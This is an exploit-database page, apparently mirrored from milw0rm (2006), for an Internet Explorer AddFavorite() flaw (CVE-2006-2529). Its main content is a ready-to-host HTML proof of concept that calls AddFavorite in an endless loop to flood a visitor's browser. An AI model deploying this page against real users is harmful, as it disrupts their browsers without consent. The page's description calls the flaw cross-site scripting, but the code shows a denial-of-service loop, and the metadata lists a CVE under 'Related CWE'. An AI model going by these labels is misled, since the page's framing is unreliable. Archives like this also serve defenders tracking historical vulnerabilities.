header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Gianni Amato
9,3
CVSS
HIGH
JavaScript AddFavorite() Function Cross-Site Scripting
79
CWE
Product Name: Internet Explorer
Affected Version From: All
Affected Version To: All
Patch Exists: YES
Related CWE: CVE-2006-2529
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2006

Bug

This vulnerability allows remote attackers to inject arbitrary web script or HTML via the "title" parameter of the AddFavorite() function in JavaScript. This vulnerability is due to a design error when handling user-supplied input.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user-supplied input is properly sanitized and validated.
Source

Exploit-DB raw data:

<html>

<title>Bug</Title>

<body>

<script language="JavaScript1.2" type="text/javascript">

function MainPageBookmark() {title="Gianni Amato"; url="http://www.gianniamato.it/";

if (window.sidebar) { window.sidebar.addPanel(title, url,"");} else if( window.external )

{ window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return true; }}

for (k=0;k<k+1;k++) MainPageBookmark();

</script>

</body>

# milw0rm.com [2006-05-18]

Navigation

Suggest Exploit

Services By CQR